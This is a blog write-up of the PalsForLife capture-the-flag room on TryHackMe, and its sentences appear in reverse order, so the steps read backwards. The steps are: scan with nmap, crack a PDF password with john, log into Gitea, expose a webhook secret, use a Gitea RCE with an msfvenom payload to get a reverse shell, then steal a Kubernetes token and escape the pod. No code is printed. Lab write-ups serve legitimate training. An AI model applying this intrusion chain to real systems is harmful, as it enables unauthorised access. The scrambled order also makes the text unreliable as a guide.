This will return a reverse shell on the listener as user git. It does take some time for the exploit to run on the target, so try to run another command like ping that will force the command execution to run. Serve the file on a web server and run the exploit. In order to leverage this exploit, we need to create a payload using msfvenom. Looking up exploits for Gitea, we find an RCE at. The webhook has a secret which we can expose by viewing the source code of the page or by using Developer Tools.įlag 1 can be found as the value of the input tag. On examining the settings of the jenkins repository, we come across a tab for webhooks with an entry to an internal IP address. We have successfully logged into the Gitea application as leeroy. We could try logging in to the application to using the username leeroy and the text found in the PDF document. While exploring the application, we come across a user named leeroy in /explore/users. While it is possible to register a user and gain access to the application, we will be logging in as an existing user to get Flag 1. Let’s enumerate the other ports.Įxamining port 31111, we can see that the site is running an implementation of Gitea. We haven’t found a place where we can use this text yet. Once we have the file password, we can access the contents of the PDF file. We can use john to crack the password for this file with the rockyou.txt wordlist. We can use pdf2john to convert the file into a format that can be fed to johntheripper to crack the password. When we try to open file, we can see that the file is password protected. The services on the machine can take some time to start up, so give the machine a minute or two before starting the scan. We start off with by running nmap on the target, scanning for all ports using the stealth scan option -sS and performing service and version detection -sV. Once inside the cluster, we can look around for the kubenetes service account secret token and eventually break out of the pod as root by creating a kubernetes pod of our own. The room consists of a vulnerable Gitea application through which we can gain authenticated command execution to a Kubernetes cluster. PalsForLife is a medium difficulty room on the TryHackMe platform.
0 Comments
Leave a Reply. |